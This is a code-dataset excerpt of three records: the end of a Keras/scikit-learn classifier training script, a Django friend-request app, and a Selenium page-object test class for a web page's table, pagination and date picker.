optimizer = 'sgd',\r\n metrics = ['accuracy'])\r\n\r\n\r\nmodel.fit(intermediate_output, ytrain1,\r\n batch_size=20,\r\n epochs=20, \r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(intermediate_output_2, ytest1))\r\n\r\nkeras.callbacks.EarlyStopping(monitor = 'val_acc',\r\n min_delta=0.1,\r\n patience=3,\r\n verbose=0,mode='auto')\r\nmodel.evaluate(intermediate_output_2, ytest1)\r\nmodel.evaluate(intermediate_output, ytrain1)\r\n####################################################CNN\r\n\r\ninput_img = Input(shape=(2,2,1))\r\nx = Conv2D(30, kernel_size=(2, 1),activation='relu',padding = 'same')(input_img)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(50,(2,1),activation='relu',padding = 'same')(x)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(50,(2,1),activation='relu',padding = 'same')(x)\r\nx = BatchNormalization()(x)\r\nx = ReLU()(x)\r\nx = Conv2D(20,(2,1),activation='relu',padding = 'same')(x)\r\nx = ReLU()(x)\r\nx = Dropout(0.2)(x)\r\nx = Flatten()(x)\r\nx_final = Dense(10,activation='softmax')(x)\r\n\r\ncnn = Model(input_img, x_final)\r\ncnn.summary()\r\ncnn.compile(optimizer='adam', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\ncnn.fit(data1, ytrain1,\r\n batch_size=15,\r\n epochs=100,\r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(data2, ytest1))\r\ncnn.compile(optimizer='sgd', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\ncnn.fit(data1, ytrain1,\r\n batch_size=15,\r\n epochs=10,\r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(data2, ytest1))\r\ncnn.evaluate(data2,ytest1)\r\ncnn.evaluate(data1,ytrain1)", "sub_path": "NN_KNN_SVM_RF_DF.py", "file_name": "NN_KNN_SVM_RF_DF.py", "file_ext": "py", "file_size_in_byte": 11919, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.io.loadmat", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 54, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 58, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 58, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 62, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 62, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 65, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 65, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 68, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 68, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 71, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 71, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 74, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 74, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 82, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 86, "usage_type": "call"}, {"api_name": "neupy.algorithms.LevenbergMarquardt", "line_number": 96, "usage_type": "call"}, {"api_name": 
"neupy.algorithms", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ravel", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 136, "usage_type": "name"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 144, "usage_type": "name"}, {"api_name": "pydotplus.graph_from_dot_data", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 160, "usage_type": "name"}, {"api_name": "pydotplus.graph_from_dot_data", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 194, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 210, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 219, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 219, "usage_type": "name"}, {"api_name": "scipy.io.loadmat", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 223, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 227, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 228, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 229, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 230, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 231, "usage_type": "call"}, 
{"api_name": "keras.layers.Conv2D", "line_number": 232, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 233, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 235, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 261, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 261, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 262, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 263, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 264, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 272, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 273, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 274, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 275, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 276, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 277, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 278, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 280, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 282, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 311, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 311, "usage_type": "attribute"}, {"api_name": "keras.layers.Input", "line_number": 319, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 320, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 321, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 322, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 323, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 324, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 325, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 326, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 327, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 328, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 329, "usage_type": "call"}, {"api_name": "keras.layers.ReLU", "line_number": 330, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 331, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 332, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 333, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 335, "usage_type": "call"}]} +{"seq_id": "147363309", "text": "from django.urls import path\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom 
django.contrib.auth.decorators import login_required\n\n# models.py\nclass Profile(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n slug = models.SlugField()\n friends = models.ManyToManyField(\"Profile\", blank=True)\n\n def __str__(self):\n return str(self.user.username)\n\n def get_absolute_url(self):\n return \"/users/{}\".format(self.slug)\n\n\ndef post_save_user_model_receiver(sender, instance, created, *args, **kwargs):\n if created:\n try:\n Profile.objects.create(user=instance)\n except:\n pass\n\n\npost_save.connect(post_save_user_model_receiver,\n sender=settings.AUTH_USER_MODEL)\n\n\nclass FriendRequest(models.Model):\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='to_user',\n on_delete=models.CASCADE\n )\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='from_user',\n on_delete=models.CASCADE\n )\n timestamp = models.DateTimeField(auto_now_add=True) # set when created\n\n def __str__(self):\n return f\"From {self.from_user.username}, to {self.to_user.username}\"\n\n\nadmin.site.register(Profile)\nadmin.site.register(FriendRequest)\n\n# views.py\nUser = get_user_model()\n@login_required\ndef users_list(request):\n\tusers = Profile.objects.exclude(user=request.user)\n\tme = Profile.objects.get(user=request.user)\n\treturn render(request, \"accounts/home.html\", {'me':me,'users': users})\n\n\ndef send_friend_request(request, id):\n # id - id юзера которому ты отправляешь запрос на дружбу\n\tif request.user.is_authenticated:\n\t\tuser = get_object_or_404(User, id=id)\n\t\tfrequest, created = FriendRequest.objects.get_or_create(\n\t\t\tfrom_user=request.user,\n\t\t\tto_user=user\n\t\t)\n\t\treturn HttpResponseRedirect('/users')\n\n\ndef cancel_friend_request(request, id):\n\tif request.user.is_authenticated:\n\t\tuser = get_object_or_404(User, id=id)\n\t\tfrequest = FriendRequest.objects.filter(\n\t\t\tfrom_user=request.user,\n\t\t\tto_user=user).first()\n\t\tfrequest.delete()\n\t\treturn HttpResponseRedirect('/users')\n\n\ndef accept_friend_request(request, id):\n\tfrom_user = get_object_or_404(User, id=id)\n\tfrequest = FriendRequest.objects.filter(\n\t\tfrom_user=from_user, to_user=request.user).first()\n\tuser1 = frequest.to_user\n\tuser2 = from_user\n\tuser1.profile.friends.add(user2.profile)\n\tuser2.profile.friends.add(user1.profile)\n\tfrequest.delete()\n\treturn HttpResponseRedirect('/users/{}'.format(request.user.profile.slug))\n\n\ndef delete_friend_request(request, id):\n\tfrom_user = get_object_or_404(User, id=id)\n\tfrequest = FriendRequest.objects.filter(\n\t\tfrom_user=from_user, to_user=request.user).first()\n\tfrequest.delete()\n\treturn HttpResponseRedirect('/users/{}'.format(request.user.profile.slug))\n\n\ndef profile_view(request, slug):\n\tp = Profile.objects.filter(slug=slug).first()\n\tprint(Profile.objects.filter(slug='admin'))\n\tu = p.user\n\tsent_friend_requests = FriendRequest.objects.filter(from_user=p.user)\n\trec_friend_requests = FriendRequest.objects.filter(to_user=p.user)\n\tfriends = p.friends.all()\n\t# is this user our friend\n\tbutton_status = 'none'\n\tif p not in request.user.profile.friends.all():\n\t\t\tbutton_status = 'not_friend'\n\t\t\t# if we have sent him a friend request\n\t\t\tif len(FriendRequest.objects.filter(\n\t\t\t\t\t\t\tfrom_user=request.user).filter(to_user=p.user)) == 1:\n\t\t\t\t\tbutton_status = 'friend_request_sent'\n\tcontext = {\n\t\t\t'u': u,\n\t\t\t'button_status': button_status,\n\t\t\t'friends_list': 
friends,\n\t\t\t'sent_friend_requests': sent_friend_requests,\n\t\t\t'rec_friend_requests': rec_friend_requests\n\t}\n\treturn render(request, \"accounts/profile.html\", context)\n\n\n\n# def profile_view(request, slug):\n# \tp = Profile.objects.filter(slug=slug).first()\n# \tu = p.user\n# \tsent_friend_request = FriendRequest.objects.filter(from_user=p.user)\n# \trec_friend_request = FriendRequest.objects.filter(to_user=p.user)\n# \tfriends = p.friends.all()\n", "sub_path": "jd/10_friends/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.signals.post_save.connect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models.signals.post_save", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 53, 
"usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 53, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 54, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 54, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 58, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 78, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 87, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "111318308", "text": "import time\n\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\nfrom Config.TestData import TestData\nfrom Pages.BasePage import BasePage\n\n\nclass CommunicationPage(BasePage):\n\n \"\"\"By Locators\"\"\"\n Head_Title = (By.CSS_SELECTOR, 'h1.main-title')\n Download_CSV_Btn = (By.CSS_SELECTOR, 'button.down_excel')\n Total_Rows = (By.CSS_SELECTOR, 'tr.tr2')\n Calendar_Date_Range = (By.CSS_SELECTOR, 'input#dateRange')\n Left_Month_Year_Value = (By.XPATH, \"(//th[@class= 'month'])[1]\")\n Right_Month_Year_Value = (By.XPATH, \"(//th[@class= 'month'])[2]\")\n Calendar_Next_Btn = (By.CSS_SELECTOR, 'th.next.available')\n Calendar_Back_BTN = (By.CSS_SELECTOR, \"th.prev.available\")\n Calendar_Apply_Btn = (By.CSS_SELECTOR, 'button.applyBtn')\n Calendar_Date_Range_Display = (By.CSS_SELECTOR, 'span.drp-selected')\n Calendar_Left_Day = (By.XPATH, \"//div[@class='drp-calendar left'] //td[@class ='available' or @ class ='weekend \"\n \"available' or @ class ='active start-date active end-date available' or @ class \"\n \"='in-range available' or @ class ='weekend in-range available']\")\n\n Calendar_Right_Day = (By.XPATH, \"//div[@class='drp-calendar right']// td[@class ='available' or @ class ='weekend \"\n \"available' or @ class ='active start-date active end-date available' or @ class \"\n \"='in-range available' or @ class ='weekend in-range available']\")\n\n SelectAll_CheckBox = (By.CSS_SELECTOR, \"input.chkall\")\n All_ChkBox_On_Page = (By.CSS_SELECTOR, 'input.chkbx')\n Action_Edit_Button = (By.XPATH, \"(//p[@title = 'Edit'])[1]\")\n Action_Update_Button = (By.CSS_SELECTOR, \"button.btn-update\")\n Action_Cancel_Button = (By.XPATH, \"//button[text() = 'Cancel']\")\n Action_View_Button = (By.XPATH, \"(//button[@class = 'btn btn-primary btn-xs user'])[1]\")\n View_Customer_Chat_Window = (By.XPATH, \"(//h4[@class = 'modal-title'])[1]\")\n Status_Dropdown = (By.XPATH, \"(//select[@id = 'gender1'])[1]\")\n Status_DropDown_Values = 
(By.XPATH, \"(//select[@id = 'gender1'])[1]/option\")\n Edit_EmailID_txtfield = (By.XPATH, \"(//input[@id = 'email'])[1]\")\n Edit_Phone_txtfield = (By.XPATH, \"(//input[@id = 'phone'])[1]\")\n EmailId = (By.XPATH, \"//tbody//tr[1]//td[6]\")\n Phone = (By.XPATH, \"//tbody//tr[1]//td[7]\")\n Delete_Btn = (By.XPATH, \"(//p[@title = 'Delete'])[1]\")\n Delete_popup_OK_Btn = (By.CSS_SELECTOR, 'button.swal-button--danger')\n Row_to_be_Deleted = (By.XPATH, \"(//tbody//tr[1])[1]\")\n Filter_Leads_DropDown = (By.ID, 'filterLeads')\n All_Action_View_Button = (By.CSS_SELECTOR, 'button.btn.btn-primary.btn-xs.user')\n Customer_Chats = (By.XPATH, \"//div[@class = 'table_chat']/div\")\n All_Customer_Chat_Close_Btn = (By.XPATH, \"(//button[@class = 'modal_close'])\")\n Pagination_Next_Btn = (By.CSS_SELECTOR, 'span.glyphicon-chevron-right')\n Pagination_Previous_Btn = (By.CSS_SELECTOR, 'span.glyphicon-chevron-left')\n Pagination_First_Btn = (By.XPATH, \"//a[text() = 'First']\")\n Pagination_Last_Btn = (By.XPATH, \"//a[text() = 'Last']\")\n\n\n\n \"\"\"Page Actions\"\"\"\n\n def __init__(self, driver):\n super().__init__(driver)\n\n def is_headTitle_visble(self):\n return self.is_visible(self.Head_Title)\n\n def get_downloaded_filePath(self, file_path):\n self.do_click(self.Download_CSV_Btn)\n time.sleep(5)\n return self.is_file_exist(file_path)\n\n def click_calendarDateRange(self):\n self.do_click(self.Calendar_Date_Range)\n\n def click_select_all_checkbox_btn(self):\n self.do_click(self.SelectAll_CheckBox)\n\n def select_Leads_Dropdown(self):\n select = Select(self.get_element(self.Filter_Leads_DropDown))\n select.select_by_value('Leads')\n\n def check_select_all_checkbox_selected(self):\n return self.elements_are_selected(self.All_ChkBox_On_Page, self.SelectAll_CheckBox)\n\n def check_edit_elements(self):\n self.do_click(self.Action_Edit_Button)\n return self.is_visible(self.Action_Update_Button)\n\n def check_update_btn(self, emailText, phoneText):\n self.do_click(self.Action_Edit_Button)\n self.driver.find_element_by_xpath(\"(//input[@id = 'email'])[1]\").clear()\n self.do_send_keys(self.Edit_EmailID_txtfield, emailText)\n self.driver.find_element_by_xpath(\"(//input[@id = 'phone'])[1]\").clear()\n self.do_send_keys(self.Edit_Phone_txtfield, phoneText)\n self.do_click(self.Action_Update_Button)\n time.sleep(2)\n emailVal = self.get_element_text(self.EmailId)\n phoneVal = self.get_element_text(self.Phone)\n return [emailVal, phoneVal]\n\n def get_Name_in_row(self):\n return self.get_element_attribute(self.Row_to_be_Deleted, 'data-email')\n\n def delete_record_get_name(self):\n # beforeDeletionRows = self.count_total_rows()\n self.do_click(self.Delete_Btn)\n self.do_click(self.Delete_popup_OK_Btn)\n time.sleep(3)\n # afterDeletionRows = self.count_total_rows()\n\n # if beforeDeletionRows != afterDeletionRows:\n return self.get_element_attribute(self.Row_to_be_Deleted, 'data-email')\n # else:\n # return False\n\n\n def click_cancel_btn(self):\n self.do_click(self.Action_Edit_Button)\n if self.is_visible(self.Action_Update_Button):\n self.do_click(self.Action_Cancel_Button)\n time.sleep(1)\n return self.is_visible(self.Action_Edit_Button)\n\n def count_total_rows(self):\n Rows = self.get_all_elements(self.Total_Rows)\n return len(Rows)\n\n def date_picker_functionality(self, Expected_Left_Date,Expected_Right_Date):\n self.click_calendarDateRange()\n self.select_dates_in_calendar(Expected_Left_Date,Expected_Right_Date)\n self.do_click(self.Calendar_Apply_Btn)\n self.click_calendarDateRange()\n Date_Display 
=self.get_element_text(self.Calendar_Date_Range_Display)\n Left_Date = Date_Display.split(\"-\")[0].strip()\n Right_Date = Date_Display.split(\"-\")[1].strip()\n Left_Day = Left_Date.split(\"/\")[0]\n Right_Day = Right_Date.split(\"/\")[0]\n Expected_Left_Day = Expected_Left_Date.split(\" \")[0].strip()\n Expected_Right_Day = Expected_Right_Date.split(\" \")[0].strip()\n if Left_Day==Expected_Left_Day and Right_Day==Expected_Right_Day:\n return True\n else:\n return False\n\n def click_view_button(self):\n self.do_click(self.Action_View_Button)\n return self.is_element_displayed(self.View_Customer_Chat_Window)\n\n def check_status_dropdown_values(self):\n self.do_click(self.Action_Edit_Button)\n self.do_click(self.Status_Dropdown)\n status_dropdown_values = self.select_by_dropdown(self.Status_Dropdown)\n return status_dropdown_values\n\n def select_status_dropdown_values(self, Status_Value):\n self.do_click(self.Action_Edit_Button)\n self.do_click(self.Status_Dropdown)\n select = Select(self.get_element(self.Status_Dropdown))\n select.select_by_visible_text(Status_Value)\n self.do_click(self.Action_Update_Button)\n elements = self.get_all_elements(self.Status_DropDown_Values)\n for ele in elements:\n if ele.text == Status_Value:\n return self.is_element_displayed(ele.get_attribute('style'))\n\n def get_total_customer_chats(self):\n All_View_Buttons = self.get_all_elements(self.All_Action_View_Button)\n\n if len(All_View_Buttons) > 10:\n i = 1\n for view_button in All_View_Buttons:\n if view_button.is_displayed():\n view_button.click()\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\"+str(i)+\"]\").click()\n i = i+2\n time.sleep(1)\n else:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n self.driver.find_element_by_css_selector(\"span.glyphicon.glyphicon-chevron-right\").click()\n view_button.click()\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\" + str(i) + \"]\").click()\n i = i + 2\n time.sleep(1)\n return len_customer_chats\n\n else:\n i = 1\n for view_button in All_View_Buttons:\n view_button.click()\n\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\" + str(i) + \"]\").click()\n i = i + 2\n time.sleep(1)\n return len_customer_chats\n\n\n def click_pagination_next_button(self):\n if self.count_total_rows() > 10:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Next_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n for row in rows:\n if row.get_attribute('data-index') == '11' and row.get_attribute('style') == '':\n return True\n\n\n def click_pagination_previous_button(self):\n if self.count_total_rows() > 10:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Next_Btn)\n self.do_click(self.Pagination_Previous_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n for row in rows:\n if row.get_attribute('data-index') == '1' and row.get_attribute('style') == '':\n return True\n\n def click_pagination_first_button(self):\n total_rows = self.count_total_rows()\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n 
self.do_click(self.Pagination_Last_Btn)\n self.do_click(self.Pagination_First_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n first_row = rows[0]\n if first_row.get_attribute('data-index') == '1':\n return True\n else:\n return False\n\n def click_pagination_Last_button(self):\n total_rows = self.count_total_rows()\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Last_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n last_row = rows[-1]\n if last_row.get_attribute('data-index') == str(total_rows):\n return True\n else:\n return False\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "Pages/CommunicationPage.py", "file_name": "CommunicationPage.py", "file_ext": "py", "file_size_in_byte": 11155, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Pages.BasePage.BasePage", "line_number": 11, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 18, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 18, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 22, "usage_type": "attribute"}, {"api_name": 